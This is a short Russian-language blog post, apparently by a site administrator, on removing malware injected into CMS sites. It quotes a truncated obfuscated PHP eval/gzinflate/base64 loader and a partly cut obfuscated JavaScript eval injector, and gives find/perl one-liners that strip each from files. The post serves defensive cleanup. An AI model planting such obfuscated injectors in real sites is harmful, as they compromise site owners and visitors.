Рубрика: CMS
На всём протяжении использования своих сайтов или работы в хостинг-провайдеров я сталкивался с разными движками. Об этом пишу тут
Удаление кода
Не боимся различных спец.символов. <?php eval(“\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\ x28’jVNtT9tADP4+af8hQxNtBW0 … WqZ03tXtv1XthvHnT853nP6Udw5O+8376F1Vr+Se/qlsnaHrF+/AQ==’\x29\x29\x29\x3B”); ?> Делаем резервную копию изменяемых файлов и запускаем команду find ./ -type f -name “*.php” -exec perl -pi -e ‘s/\<\?php\ eval.*\”\)\;\ \?\>//g”’ ‘{}’ \;
Вирусы на сайте. Продолжение. Новый паттерн
Найден новый паттерн. Заражаются все .js-файлы try{q=document.createElement(“d”+”i”+”v”);q.appendChild(q+””);}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz=’al’;zz=’zv’.substr(123-122)+zz;ss=[];f=’fr’+’om’+’Ch’;f+=’arC’;f+=’ode’;w=this;e=w[f[“substr”](11)+zz];n=”19$50$57.5$ <часть кода убрана> 9.5$19$19.5$28.5″[((e)?”s”:””)+”p”+”lit”](“a$”[((e)?”su”:””)+”bstr”](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} Выкусывается командой: find ./ -type f -name “*.js” -exec perl -pi -e ‘s/try\{q=documen.*q=ss;e\(q\)//g”’ ‘{}’ \; Не забываем перед операцией делать резервную копию директории/сайта.